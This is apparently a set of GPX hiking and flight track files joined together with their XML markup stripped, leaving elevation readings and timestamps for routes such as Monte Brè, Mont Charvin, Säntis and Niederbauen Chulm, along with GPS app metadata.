+2015-06-30T09:05:09Z
+
+
+1833.44
+2015-06-30T09:11:25Z
+
+
+1841.77
+2015-06-30T09:13:46Z
+
+
+1845.28
+2015-06-30T09:19:55Z
+
+
+1844.96
+2015-06-30T09:21:30Z
+
+
+1841.66
+2015-06-30T09:22:44Z
+
+
+1854.24
+2015-06-30T09:24:10Z
+
+
+1860.35
+2015-06-30T09:24:35Z
+
+
+1867.25
+2015-06-30T09:25:05Z
+
+
+1878.42
+2015-06-30T09:25:50Z
+
+
+1895.31
+2015-06-30T09:27:07Z
+
+
+1897.01
+2015-06-30T09:28:19Z
+
+
+1944.24
+2015-06-30T09:32:21Z
+
+
+2004.14
+2015-06-30T09:37:28Z
+
+
+2024.3
+2015-06-30T09:39:22Z
+
+
+2038.01
+2015-06-30T09:40:41Z
+
+
+2054.5
+2015-06-30T09:41:46Z
+
+
+2068.59
+2015-06-30T09:43:36Z
+
+
+2080.05
+2015-06-30T09:44:55Z
+
+
+2099.04
+2015-06-30T09:47:17Z
+
+
+2101.16
+2015-06-30T09:47:48Z
+
+
+2096.86
+2015-06-30T09:48:20Z
+
+
+2094.49
+2015-06-30T09:48:54Z
+
+
+2097.19
+2015-06-30T09:50:48Z
+
+
+2098.01
+2015-06-30T09:51:51Z
+
+
+2099.04
+2015-06-30T09:53:14Z
+
+
+2084.1
+2015-06-30T09:55:06Z
+
+
+2053.65
+2015-06-30T09:56:45Z
+
+
+2037.7
+2015-06-30T09:57:53Z
+
+
+1986.66
+2015-06-30T10:00:00Z
+
+
+1940.59
+2015-06-30T10:02:14Z
+
+
+1908.21
+2015-06-30T10:04:05Z
+
+
+1890.38
+2015-06-30T10:05:29Z
+
+
+1885.97
+2015-06-30T10:06:42Z
+
+
+1874.7
+2015-06-30T10:08:22Z
+
+
+1872.24
+2015-06-30T10:08:44Z
+
+
+1860.11
+2015-06-30T10:10:01Z
+
+
+1855.94
+2015-06-30T10:12:09Z
+
+
+1853.89
+2015-06-30T10:13:31Z
+
+
+1838.29
+2015-06-30T10:36:56Z
+
+
+1819.87
+2015-06-30T10:40:49Z
+
+
+1782.79
+2015-06-30T10:44:19Z
+
+
+1777.77
+2015-06-30T10:44:51Z
+
+
+1772.67
+2015-06-30T10:45:38Z
+
+
+1764.93
+2015-06-30T10:46:59Z
+
+
+1741.59
+2015-06-30T10:50:16Z
+
+
+1721.88
+2015-06-30T10:52:25Z
+
+
+1707.18
+2015-06-30T10:55:18Z
+
+
+1668.64
+2015-06-30T10:59:01Z
+
+
+1628.5
+2015-06-30T11:03:42Z
+
+
+1619.65
+2015-06-30T11:05:05Z
+
+
+1606.19
+2015-06-30T11:06:44Z
+
+
+1590.94
+2015-06-30T11:09:37Z
+
+
+1584.22
+2015-06-30T11:10:27Z
+
+
+1568.51
+2015-06-30T11:11:29Z
+
+
+1547.84
+2015-06-30T11:13:41Z
+ "
+"
+
+
+Monte Brè - Pregassona
+
+fuemm63
+
+fuemm63 on GPSies.com
+GPSiesUserOnWeb
+
+
+Monte Brè - Pregassona on GPSies.com
+trackOnWeb
+2015-06-11T20:04:23Z
+
+one-way trip
+20.0
+5416.351928066745
+367.0
+913.0
+550.0
+
+Monte Brè - Pregassona on GPSies.com
+
+trackOnWeb
+
+
+897.0
+2010-01-01T00:00:00Z
+
+
+895.0
+2010-01-01T00:00:12Z
+
+
+910.0
+2010-01-01T00:00:45Z
+
+
+876.0
+2010-01-01T00:01:47Z
+
+
+855.0
+2010-01-01T00:02:34Z
+
+
+824.0
+2010-01-01T00:03:19Z
+
+
+788.0
+2010-01-01T00:04:32Z
+
+
+785.0
+2010-01-01T00:05:20Z
+
+
+771.0
+2010-01-01T00:05:55Z
+
+
+779.0
+2010-01-01T00:06:40Z
+
+
+786.0
+2010-01-01T00:07:16Z
+
+
+793.0
+2010-01-01T00:07:59Z
+
+
+795.0
+2010-01-01T00:08:38Z
+
+
+798.0
+2010-01-01T00:08:50Z
+
+
+791.0
+2010-01-01T00:09:06Z
+
+
+789.0
+2010-01-01T00:09:26Z
+
+
+789.0
+2010-01-01T00:09:59Z
+
+
+797.0
+2010-01-01T00:10:38Z
+
+
+793.0
+2010-01-01T00:11:24Z
+
+
+779.0
+2010-01-01T00:12:19Z
+
+
+790.0
+2010-01-01T00:12:34Z
+
+
+791.0
+2010-01-01T00:13:22Z
+
+
+763.0
+2010-01-01T00:14:03Z
+
+
+757.0
+2010-01-01T00:14:57Z
+
+
+742.0
+2010-01-01T00:15:05Z
+
+
+744.0
+2010-01-01T00:15:18Z
+
+
+723.0
+2010-01-01T00:15:54Z
+
+
+729.0
+2010-01-01T00:16:29Z
+
+
+721.0
+2010-01-01T00:16:46Z
+
+
+710.0
+2010-01-01T00:16:59Z
+
+
+697.0
+2010-01-01T00:17:19Z
+
+
+691.0
+2010-01-01T00:17:52Z
+
+
+674.0
+2010-01-01T00:18:07Z
+
+
+680.0
+2010-01-01T00:18:34Z
+
+
+673.0
+2010-01-01T00:18:41Z
+
+
+667.0
+2010-01-01T00:18:59Z
+
+
+655.0
+2010-01-01T00:19:30Z
+
+
+642.0
+2010-01-01T00:20:06Z
+
+
+645.0
+2010-01-01T00:20:32Z
+
+
+635.0
+2010-01-01T00:21:07Z
+
+
+617.0
+2010-01-01T00:21:26Z
+
+
+608.0
+2010-01-01T00:22:10Z
+
+
+574.0
+2010-01-01T00:22:48Z
+
+
+569.0
+2010-01-01T00:23:06Z
+
+
+562.0
+2010-01-01T00:23:13Z
+
+
+550.0
+2010-01-01T00:23:35Z
+
+
+543.0
+2010-01-01T00:23:44Z
+
+
+521.0
+2010-01-01T00:24:52Z
+
+
+519.0
+2010-01-01T00:25:16Z
+
+
+523.0
+2010-01-01T00:25:42Z
+
+
+506.0
+2010-01-01T00:26:02Z
+
+
+501.0
+2010-01-01T00:26:14Z
+
+
+502.0
+2010-01-01T00:26:35Z
+
+
+497.0
+2010-01-01T00:26:45Z
+
+
+491.0
+2010-01-01T00:26:51Z
+
+
+488.0
+2010-01-01T00:27:09Z
+
+
+487.0
+2010-01-01T00:27:18Z
+
+
+476.0
+2010-01-01T00:27:41Z
+
+
+460.0
+2010-01-01T00:27:59Z
+
+
+451.0
+2010-01-01T00:28:14Z
+
+
+450.0
+2010-01-01T00:28:30Z
+
+
+470.0
+2010-01-01T00:28:55Z
+
+
+435.0
+2010-01-01T00:29:39Z
+
+
+435.0
+2010-01-01T00:30:03Z
+
+
+412.0
+2010-01-01T00:30:26Z
+
+
+407.0
+2010-01-01T00:30:49Z
+
+
+386.0
+2010-01-01T00:31:28Z
+
+
+382.0
+2010-01-01T00:31:44Z
+
+
+376.0
+2010-01-01T00:31:58Z
+
+
+367.0
+2010-01-01T00:32:29Z
+ "
+"
+
+
+
+
+
+
+Core Coders Ltd
+2017-08-21T15:22:08Z
+
+
+Day 43 2016/2017
+
+
+
+1943.0
+2017-08-21T09:48:04Z
+
+
+1918.0
+2017-08-21T09:51:26Z
+
+
+1920.0
+2017-08-21T09:51:58Z
+
+
+1920.0
+2017-08-21T09:53:11Z
+
+
+1925.0
+2017-08-21T09:54:43Z
+
+
+1926.0
+2017-08-21T09:55:58Z
+
+
+1929.0
+2017-08-21T09:57:09Z
+
+
+1938.0
+2017-08-21T09:59:27Z
+
+
+1944.0
+2017-08-21T10:00:51Z
+
+
+1945.0
+2017-08-21T10:01:38Z
+
+
+1956.0
+2017-08-21T10:03:20Z
+
+
+1973.0
+2017-08-21T10:05:19Z
+
+
+1995.0
+2017-08-21T10:07:58Z
+
+
+2007.0
+2017-08-21T10:09:08Z
+
+
+2026.0
+2017-08-21T10:10:50Z
+
+
+2025.0
+2017-08-21T10:11:29Z
+
+
+2042.0
+2017-08-21T10:13:24Z
+
+
+2049.0
+2017-08-21T10:15:04Z
+
+
+2085.0
+2017-08-21T10:18:12Z
+
+
+2098.0
+2017-08-21T10:22:48Z
+
+
+2125.0
+2017-08-21T10:25:42Z
+
+
+2176.0
+2017-08-21T10:34:56Z
+
+
+2195.0
+2017-08-21T10:37:47Z
+
+
+2249.0
+2017-08-21T10:47:13Z
+
+
+2253.0
+2017-08-21T10:49:50Z
+
+
+2282.0
+2017-08-21T10:53:07Z
+
+
+2313.0
+2017-08-21T10:56:03Z
+
+
+2318.0
+2017-08-21T10:57:55Z
+
+
+2423.0
+2017-08-21T11:07:13Z
+
+
+2451.0
+2017-08-21T11:16:23Z
+
+
+2479.0
+2017-08-21T11:19:38Z
+
+
+2541.0
+2017-08-21T11:28:50Z
+
+
+2601.0
+2017-08-21T11:40:02Z
+
+
+2647.0
+2017-08-21T11:46:50Z
+
+
+2744.0
+2017-08-21T12:02:02Z
+
+
+2789.0
+2017-08-21T12:34:07Z
+
+
+2725.0
+2017-08-21T13:23:12Z
+
+
+2634.0
+2017-08-21T13:31:38Z
+
+
+2575.0
+2017-08-21T13:34:49Z
+
+
+2532.0
+2017-08-21T13:39:54Z
+
+
+2511.0
+2017-08-21T13:45:28Z
+
+
+2493.0
+2017-08-21T13:47:33Z
+
+
+2401.0
+2017-08-21T13:57:31Z
+
+
+2357.0
+2017-08-21T14:03:48Z
+
+
+2331.0
+2017-08-21T14:05:57Z
+
+
+2294.0
+2017-08-21T14:10:55Z
+
+
+2273.0
+2017-08-21T14:12:11Z
+
+
+2253.0
+2017-08-21T14:13:39Z
+
+
+2202.0
+2017-08-21T14:19:04Z
+
+
+2166.0
+2017-08-21T14:29:56Z
+
+
+2116.0
+2017-08-21T14:34:29Z
+
+
+2106.0
+2017-08-21T14:35:11Z
+
+
+2106.0
+2017-08-21T14:36:09Z
+
+
+2098.0
+2017-08-21T14:39:29Z
+
+
+2094.0
+2017-08-21T14:41:47Z
+
+
+2091.0
+2017-08-21T14:44:09Z
+
+
+2041.0
+2017-08-21T14:49:44Z
+
+
+2029.0
+2017-08-21T14:50:38Z
+
+
+2020.0
+2017-08-21T14:53:08Z
+
+
+2008.0
+2017-08-21T14:53:45Z
+
+
+2002.0
+2017-08-21T14:55:30Z
+
+
+1986.0
+2017-08-21T14:57:10Z
+
+
+1979.0
+2017-08-21T14:58:17Z
+
+
+1942.0
+2017-08-21T15:00:50Z
+
+
+1942.0
+2017-08-21T15:04:11Z
+
+
+1943.0
+2017-08-21T15:06:06Z
+
+
+1936.0
+2017-08-21T15:07:04Z
+
+
+1933.0
+2017-08-21T15:08:38Z
+
+
+1927.0
+2017-08-21T15:11:55Z
+
+
+1921.0
+2017-08-21T15:13:54Z
+
+
+1919.0
+2017-08-21T15:15:22Z
+
+
+1908.0
+2017-08-21T15:17:42Z
+
+
+1911.0
+2017-08-21T15:19:33Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-21T12:30:49Z
+
+21-JUL-15 14:30:45
+
+
+
+
+
+1761.75
+2015-07-21T09:27:00Z
+
+
+1808.38
+2015-07-21T09:29:27Z
+
+
+1818.47
+2015-07-21T09:32:46Z
+
+
+1816.55
+2015-07-21T09:34:10Z
+
+
+1817.99
+2015-07-21T09:35:58Z
+
+
+1817.51
+2015-07-21T09:37:54Z
+
+
+1829.53
+2015-07-21T09:41:21Z
+
+
+1836.26
+2015-07-21T09:43:18Z
+
+
+1826.16
+2015-07-21T09:45:21Z
+
+
+1818.47
+2015-07-21T09:46:58Z
+
+
+1815.59
+2015-07-21T09:48:37Z
+
+
+1832.41
+2015-07-21T09:50:59Z
+
+
+1835.29
+2015-07-21T09:53:09Z
+
+
+1808.86
+2015-07-21T09:56:52Z
+
+
+1811.26
+2015-07-21T09:58:36Z
+
+
+1798.28
+2015-07-21T10:00:44Z
+
+
+1788.19
+2015-07-21T10:07:08Z
+
+
+1785.79
+2015-07-21T10:10:16Z
+
+
+1776.65
+2015-07-21T10:13:20Z
+
+
+1777.61
+2015-07-21T10:16:58Z
+
+
+1792.52
+2015-07-21T10:21:37Z
+
+
+1789.15
+2015-07-21T10:40:43Z
+
+
+1781.46
+2015-07-21T10:43:07Z
+
+
+1768.48
+2015-07-21T10:44:59Z
+
+
+1764.16
+2015-07-21T10:46:35Z
+
+
+1782.42
+2015-07-21T10:50:07Z
+
+
+1793.96
+2015-07-21T10:52:11Z
+
+
+1819.91
+2015-07-21T10:56:23Z
+
+
+1855.0
+2015-07-21T11:03:53Z
+
+
+1857.4
+2015-07-21T11:09:02Z
+
+
+1833.85
+2015-07-21T11:11:58Z
+
+
+1874.23
+2015-07-21T11:38:31Z
+
+
+1889.61
+2015-07-21T11:41:18Z
+
+
+1904.03
+2015-07-21T11:45:26Z
+
+
+1912.68
+2015-07-21T11:49:05Z
+
+
+1883.84
+2015-07-21T11:53:37Z
+
+
+1847.79
+2015-07-21T11:58:07Z
+
+
+1824.24
+2015-07-21T12:01:16Z
+
+
+1814.15
+2015-07-21T12:03:03Z
+
+
+1797.32
+2015-07-21T12:07:09Z
+
+
+1782.42
+2015-07-21T12:08:39Z
+
+
+1770.41
+2015-07-21T12:10:24Z
+
+
+1746.85
+2015-07-21T12:13:09Z
+
+
+1736.28
+2015-07-21T12:14:36Z
+
+
+1717.53
+2015-07-21T12:19:18Z
+
+
+1722.82
+2015-07-21T12:23:50Z
+
+
+1727.15
+2015-07-21T12:26:53Z
+ "
+"
+
+
+
+
+
+
+GPS dump for www.flightlog.org
+2017-01-01T11:02:10Z
+
+
+Track 001
+
+
+
+2104.9
+2016-12-30T08:56:09Z
+
+
+2119.8
+2016-12-30T08:56:39Z
+
+
+2118.8
+2016-12-30T08:59:09Z
+
+
+2131.3
+2016-12-30T09:02:39Z
+
+
+2146.7
+2016-12-30T09:06:39Z
+
+
+2173.2
+2016-12-30T09:11:39Z
+
+
+2189.0
+2016-12-30T09:15:39Z
+
+
+2194.3
+2016-12-30T09:17:09Z
+
+
+2227.9
+2016-12-30T09:23:09Z
+
+
+2243.3
+2016-12-30T09:24:39Z
+
+
+2240.9
+2016-12-30T09:26:09Z
+
+
+2290.0
+2016-12-30T09:52:39Z
+
+
+2297.6
+2016-12-30T09:59:39Z
+
+
+2302.4
+2016-12-30T10:00:39Z
+
+
+2309.2
+2016-12-30T10:02:09Z
+
+
+2321.2
+2016-12-30T10:05:09Z
+
+
+2318.8
+2016-12-30T10:06:39Z
+
+
+2332.7
+2016-12-30T10:10:09Z
+
+
+2340.4
+2016-12-30T10:13:39Z
+
+
+2340.9
+2016-12-30T10:16:09Z
+
+
+2337.5
+2016-12-30T10:16:39Z
+
+
+2334.2
+2016-12-30T10:17:09Z
+
+
+2341.9
+2016-12-30T10:18:39Z
+
+
+2340.9
+2016-12-30T10:19:39Z
+
+
+2347.2
+2016-12-30T10:21:09Z
+
+
+2360.1
+2016-12-30T10:27:39Z
+
+
+2374.1
+2016-12-30T10:33:39Z
+
+
+2375.0
+2016-12-30T10:35:39Z
+
+
+2375.0
+2016-12-30T10:36:39Z
+
+
+2390.9
+2016-12-30T10:40:09Z
+
+
+2410.1
+2016-12-30T10:43:09Z
+
+
+2399.1
+2016-12-30T10:49:09Z
+
+
+2389.0
+2016-12-30T10:50:39Z
+
+
+2372.1
+2016-12-30T10:53:09Z
+
+
+2394.3
+2016-12-30T10:57:09Z
+
+
+2430.3
+2016-12-30T11:06:39Z
+
+
+2437.5
+2016-12-30T11:10:09Z
+
+
+2438.0
+2016-12-30T11:19:39Z
+
+
+2434.6
+2016-12-30T11:23:39Z
+
+
+2412.0
+2016-12-30T11:25:39Z
+
+
+2381.8
+2016-12-30T11:29:09Z
+
+
+2385.1
+2016-12-30T11:33:39Z
+
+
+2389.9
+2016-12-30T11:37:09Z
+
+
+2414.4
+2016-12-30T11:43:09Z
+
+
+2406.3
+2016-12-30T11:45:09Z
+
+
+2394.3
+2016-12-30T11:51:09Z
+
+
+2396.7
+2016-12-30T11:54:09Z
+
+
+2417.3
+2016-12-30T11:57:39Z
+
+
+2424.5
+2016-12-30T12:00:39Z
+
+
+2479.8
+2016-12-30T12:18:09Z
+
+
+2492.3
+2016-12-30T12:24:39Z
+
+
+2468.3
+2016-12-30T12:35:39Z
+
+
+2462.5
+2016-12-30T12:39:09Z
+
+
+2450.5
+2016-12-30T12:42:09Z
+
+
+2453.9
+2016-12-30T12:43:09Z
+
+
+2468.3
+2016-12-30T13:00:09Z
+ "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2017-08-20T15:21:00Z
+
+GPSies Track on GPSies.com
+
+
+
+82.0
+2010-01-01T00:00:00Z
+
+
+82.0
+2010-01-01T00:00:05Z
+
+
+85.0
+2010-01-01T00:00:34Z
+
+
+53.0
+2010-01-01T00:07:31Z
+
+
+59.0
+2010-01-01T00:08:47Z
+
+
+55.0
+2010-01-01T00:10:14Z
+
+
+66.0
+2010-01-01T00:11:34Z
+
+
+71.0
+2010-01-01T00:12:13Z
+
+
+75.0
+2010-01-01T00:12:35Z
+
+
+76.0
+2010-01-01T00:12:59Z
+
+
+80.0
+2010-01-01T00:13:46Z
+
+
+78.0
+2010-01-01T00:15:03Z
+
+
+73.0
+2010-01-01T00:16:16Z
+
+
+66.0
+2010-01-01T00:18:26Z
+
+
+65.0
+2010-01-01T00:19:03Z
+
+
+57.0
+2010-01-01T00:19:38Z
+
+
+42.0
+2010-01-01T00:20:31Z
+
+
+30.0
+2010-01-01T00:21:06Z
+
+
+64.0
+2010-01-01T00:22:54Z
+
+
+53.0
+2010-01-01T00:23:35Z
+
+
+32.0
+2010-01-01T00:24:06Z
+
+
+32.0
+2010-01-01T00:24:47Z
+
+
+42.0
+2010-01-01T00:25:07Z
+
+
+45.0
+2010-01-01T00:25:14Z
+
+
+29.0
+2010-01-01T00:25:37Z
+
+
+48.0
+2010-01-01T00:25:54Z
+
+
+57.0
+2010-01-01T00:26:07Z
+
+
+64.0
+2010-01-01T00:26:15Z
+
+
+67.0
+2010-01-01T00:26:28Z
+
+
+58.0
+2010-01-01T00:26:43Z
+
+
+82.0
+2010-01-01T00:27:21Z
+
+
+83.0
+2010-01-01T00:27:26Z
+
+
+79.0
+2010-01-01T00:27:37Z
+
+
+83.0
+2010-01-01T00:27:48Z
+
+
+78.0
+2010-01-01T00:28:18Z
+
+
+89.0
+2010-01-01T00:29:29Z
+
+
+89.0
+2010-01-01T00:29:37Z
+
+
+92.0
+2010-01-01T00:29:50Z
+
+
+92.0
+2010-01-01T00:30:02Z
+
+
+92.0
+2010-01-01T00:30:09Z
+
+
+91.0
+2010-01-01T00:30:17Z
+
+
+92.0
+2010-01-01T00:30:24Z
+
+
+92.0
+2010-01-01T00:30:31Z
+
+
+91.0
+2010-01-01T00:30:48Z
+
+
+107.0
+2010-01-01T00:34:47Z
+
+
+107.0
+2010-01-01T00:34:55Z
+
+
+107.0
+2010-01-01T00:35:03Z
+
+
+108.0
+2010-01-01T00:35:11Z
+
+
+95.0
+2010-01-01T00:35:51Z
+
+
+87.0
+2010-01-01T00:36:09Z
+
+
+86.0
+2010-01-01T00:36:21Z
+
+
+85.0
+2010-01-01T00:36:32Z
+
+
+82.0
+2010-01-01T00:37:56Z
+
+
+82.0
+2010-01-01T00:38:01Z
+ "
+"
+
+
+Mont Charvin 2
+
+
+
+
+
+OruxMaps
+2016-06-23T08:58:46Z
+
+
+Mont Charvin 2
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Mont Charvin 2</h2><br /><p>Startzeit: 06/23/2016 10:58</p><p>Zielzeit: 06/23/2016 14:05</p><p>Strecke: 4,2km (03:06)</p><p>Bewegungszeit: 01:43</p><p>Ø-Geschwindigkeit: 1,3km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 5,7km/h</p><p>Minimale Höhe: 1382m</p><p>Maximale Höhe: 2404m</p><p>Steig-Geschw.: 364,2m/h</p><p>Sink-Geschw.: -177,6m/h</p><p>Aufstieg: 1039m</p><p>Abstieg: -33m</p><p>Steigzeit: 02:51</p><p>Sinkzeit: 00:11</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1383.54
+2016-06-23T08:58:12Z
+
+
+1401.87
+2016-06-23T09:01:10Z
+
+
+1406.5
+2016-06-23T09:01:29Z
+
+
+1405.53
+2016-06-23T09:02:39Z
+
+
+1425.53
+2016-06-23T09:04:55Z
+
+
+1441.36
+2016-06-23T09:06:08Z
+
+
+1456.66
+2016-06-23T09:08:14Z
+
+
+1479.87
+2016-06-23T09:10:05Z
+
+
+1495.03
+2016-06-23T09:12:08Z
+
+
+1497.53
+2016-06-23T09:13:17Z
+
+
+1503.57
+2016-06-23T09:14:53Z
+
+
+1497.83
+2016-06-23T09:15:34Z
+
+
+1502.52
+2016-06-23T09:17:11Z
+
+
+1513.41
+2016-06-23T09:21:19Z
+
+
+1519.5
+2016-06-23T09:23:20Z
+
+
+1546.41
+2016-06-23T09:26:26Z
+
+
+1573.01
+2016-06-23T09:32:24Z
+
+
+1571.52
+2016-06-23T09:33:27Z
+
+
+1612.58
+2016-06-23T09:34:52Z
+
+
+1635.0
+2016-06-23T09:37:46Z
+
+
+1634.22
+2016-06-23T09:38:40Z
+
+
+1624.97
+2016-06-23T09:39:51Z
+
+
+1647.97
+2016-06-23T09:44:00Z
+
+
+1648.58
+2016-06-23T09:45:43Z
+
+
+1660.06
+2016-06-23T09:48:12Z
+
+
+1682.61
+2016-06-23T09:51:53Z
+
+
+1701.54
+2016-06-23T09:54:55Z
+
+
+1733.67
+2016-06-23T09:58:34Z
+
+
+1720.74
+2016-06-23T09:59:10Z
+
+
+1759.02
+2016-06-23T10:03:08Z
+
+
+1800.17
+2016-06-23T10:07:34Z
+
+
+1813.05
+2016-06-23T10:11:12Z
+
+
+1842.01
+2016-06-23T10:15:00Z
+
+
+1894.61
+2016-06-23T10:22:40Z
+
+
+1901.26
+2016-06-23T10:27:18Z
+
+
+1943.68
+2016-06-23T10:29:52Z
+
+
+1958.67
+2016-06-23T10:31:59Z
+
+
+1967.3
+2016-06-23T10:33:21Z
+
+
+2037.05
+2016-06-23T10:43:52Z
+
+
+2069.94
+2016-06-23T10:48:48Z
+
+
+2090.17
+2016-06-23T10:51:30Z
+
+
+2121.58
+2016-06-23T10:55:13Z
+
+
+2124.01
+2016-06-23T10:55:46Z
+
+
+2143.17
+2016-06-23T10:58:44Z
+
+
+2160.55
+2016-06-23T11:01:10Z
+
+
+2161.67
+2016-06-23T11:18:04Z
+
+
+2206.17
+2016-06-23T11:22:46Z
+
+
+2209.8
+2016-06-23T11:24:49Z
+
+
+2229.05
+2016-06-23T11:27:13Z
+
+
+2247.71
+2016-06-23T11:32:54Z
+
+
+2260.58
+2016-06-23T11:40:21Z
+
+
+2276.11
+2016-06-23T11:44:30Z
+
+
+2294.3
+2016-06-23T11:46:24Z
+
+
+2301.23
+2016-06-23T11:47:45Z
+
+
+2314.05
+2016-06-23T11:49:35Z
+
+
+2325.21
+2016-06-23T11:50:41Z
+
+
+2356.19
+2016-06-23T11:59:06Z
+
+
+2373.55
+2016-06-23T12:00:26Z
+
+
+2404.53
+2016-06-23T12:05:08Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-12-02T15:11:21Z
+
+STRADIGUARD16:10:54
+
+
+
+
+
+
+794.67
+2017-12-02T09:35:33Z
+
+
+821.1
+2017-12-02T09:38:16Z
+
+
+851.38
+2017-12-02T09:43:01Z
+
+
+862.92
+2017-12-02T09:44:34Z
+
+
+870.61
+2017-12-02T09:45:55Z
+
+
+890.8
+2017-12-02T09:50:17Z
+
+
+938.38
+2017-12-02T09:56:24Z
+
+
+947.52
+2017-12-02T09:58:10Z
+
+
+979.24
+2017-12-02T10:03:25Z
+
+
+1000.39
+2017-12-02T10:06:40Z
+
+
+1021.06
+2017-12-02T10:09:35Z
+
+
+1026.34
+2017-12-02T10:10:11Z
+
+
+1040.28
+2017-12-02T10:13:05Z
+
+
+1036.44
+2017-12-02T10:15:26Z
+
+
+1037.88
+2017-12-02T10:17:06Z
+
+
+1021.06
+2017-12-02T10:23:06Z
+
+
+1021.06
+2017-12-02T10:24:59Z
+
+
+1020.58
+2017-12-02T10:26:12Z
+
+
+1020.1
+2017-12-02T10:29:15Z
+
+
+1009.52
+2017-12-02T10:32:33Z
+
+
+1014.81
+2017-12-02T10:35:26Z
+
+
+1000.87
+2017-12-02T10:39:59Z
+
+
+977.8
+2017-12-02T10:43:02Z
+
+
+961.46
+2017-12-02T10:47:12Z
+
+
+971.55
+2017-12-02T10:48:54Z
+
+
+1002.79
+2017-12-02T10:55:32Z
+
+
+1016.73
+2017-12-02T10:56:48Z
+
+
+1018.65
+2017-12-02T11:01:35Z
+
+
+1025.86
+2017-12-02T11:04:08Z
+
+
+1039.8
+2017-12-02T11:06:42Z
+
+
+1051.34
+2017-12-02T11:07:48Z
+
+
+1064.8
+2017-12-02T11:11:06Z
+
+
+1067.2
+2017-12-02T11:13:04Z
+
+
+1064.32
+2017-12-02T11:14:17Z
+
+
+1056.15
+2017-12-02T11:16:18Z
+
+
+1067.2
+2017-12-02T11:18:51Z
+
+
+1083.54
+2017-12-02T11:22:30Z
+
+
+1105.17
+2017-12-02T11:25:23Z
+
+
+1129.69
+2017-12-02T11:29:42Z
+
+
+1139.78
+2017-12-02T11:30:50Z
+
+
+1173.43
+2017-12-02T11:34:51Z
+
+
+1184.48
+2017-12-02T11:36:41Z
+
+
+1196.02
+2017-12-02T11:39:49Z
+
+
+1196.02
+2017-12-02T11:41:43Z
+
+
+1216.69
+2017-12-02T11:46:46Z
+
+
+1221.49
+2017-12-02T11:48:18Z
+
+
+1222.93
+2017-12-02T11:51:10Z
+
+
+1217.17
+2017-12-02T11:53:24Z
+
+
+1214.28
+2017-12-02T11:59:24Z
+
+
+1210.44
+2017-12-02T12:01:00Z
+
+
+1228.22
+2017-12-02T12:05:03Z
+
+
+1243.6
+2017-12-02T12:09:35Z
+
+
+1275.81
+2017-12-02T12:15:28Z
+ "
+"
+
+
+
+
+
+
+
+Säntis
+
+
+
+1359.92
+
+
+1359.44
+
+
+1373.86
+
+
+1398.86
+
+
+1400.78
+
+
+1401.74
+
+
+1405.58
+
+
+1439.71
+
+
+1463.26
+
+
+1489.22
+
+
+1493.06
+
+
+1513.73
+
+
+1535.84
+
+
+1542.57
+
+
+1570.45
+
+
+1579.58
+
+
+1583.91
+
+
+1594.48
+
+
+1619.48
+
+
+1627.17
+
+
+1643.03
+
+
+1654.57
+
+
+1669.95
+
+
+1677.16
+
+
+1701.19
+
+
+1730.03
+
+
+1744.45
+
+
+1749.26
+
+
+1763.2
+
+
+1783.38
+
+
+1817.99
+
+
+1824.24
+
+
+1838.18
+
+
+1848.75
+
+
+1864.61
+
+
+1883.36
+
+
+1895.86
+
+
+1901.63
+
+
+1921.33
+
+
+1925.18
+
+
+1966.03
+
+
+1996.8
+
+
+2007.37
+
+
+2026.6
+
+
+2040.54
+
+
+2057.36
+
+
+2080.43
+
+
+2083.79
+
+
+2090.04
+
+
+2107.83
+
+
+2122.25
+
+
+2132.82
+
+
+2140.99
+
+
+2143.88
+
+
+2145.32
+
+
+2147.72
+
+
+2144.36
+
+
+2182.33
+
+
+2250.58
+
+
+2262.6
+
+
+2275.1
+
+
+2280.87
+
+
+2304.9
+
+
+2332.78
+
+
+2345.27
+
+
+2356.81
+
+
+2378.92
+
+
+2395.26
+
+
+2403.43
+
+
+2394.78
+
+
+2448.13
+
+
+2460.15
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2015-10-24T08:06:59Z
+
+Niederbauen Chulm ( 1923m ) & Gütsch ( 1884m ) 24.10.2015
+
+
+
+1544.4000244140625
+2015-10-24T08:06:59Z
+
+
+1546.199951171875
+2015-10-24T08:14:29Z
+
+
+1556.800048828125
+2015-10-24T08:16:29Z
+
+
+1566.4000244140625
+2015-10-24T08:17:59Z
+
+
+1564.800048828125
+2015-10-24T08:21:29Z
+
+
+1571.199951171875
+2015-10-24T08:22:59Z
+
+
+1571.0
+2015-10-24T08:24:59Z
+
+
+1576.4000244140625
+2015-10-24T08:27:29Z
+
+
+1578.800048828125
+2015-10-24T08:28:29Z
+
+
+1602.5999755859375
+2015-10-24T08:31:29Z
+
+
+1605.4000244140625
+2015-10-24T08:31:59Z
+
+
+1614.4000244140625
+2015-10-24T08:33:29Z
+
+
+1624.5999755859375
+2015-10-24T08:35:29Z
+
+
+1657.199951171875
+2015-10-24T08:44:59Z
+
+
+1662.0
+2015-10-24T08:47:29Z
+
+
+1693.0
+2015-10-24T08:50:59Z
+
+
+1698.0
+2015-10-24T08:54:29Z
+
+
+1716.5999755859375
+2015-10-24T08:56:59Z
+
+
+1715.0
+2015-10-24T08:58:29Z
+
+
+1738.5999755859375
+2015-10-24T09:00:29Z
+
+
+1734.4000244140625
+2015-10-24T09:01:29Z
+
+
+1772.800048828125
+2015-10-24T09:05:59Z
+
+
+1823.199951171875
+2015-10-24T09:13:59Z
+
+
+1837.5999755859375
+2015-10-24T09:16:29Z
+
+
+1859.199951171875
+2015-10-24T09:20:59Z
+
+
+1872.5999755859375
+2015-10-24T09:23:29Z
+
+
+1886.800048828125
+2015-10-24T09:27:29Z
+
+
+1888.0
+2015-10-24T09:28:29Z
+
+
+1889.4000244140625
+2015-10-24T09:29:59Z
+
+
+1881.4000244140625
+2015-10-24T10:06:29Z
+
+
+1885.800048828125
+2015-10-24T10:21:29Z
+
+
+1869.199951171875
+2015-10-24T10:23:29Z
+
+
+1859.4000244140625
+2015-10-24T10:24:29Z
+
+
+1854.5999755859375
+2015-10-24T10:27:59Z
+
+
+1855.5999755859375
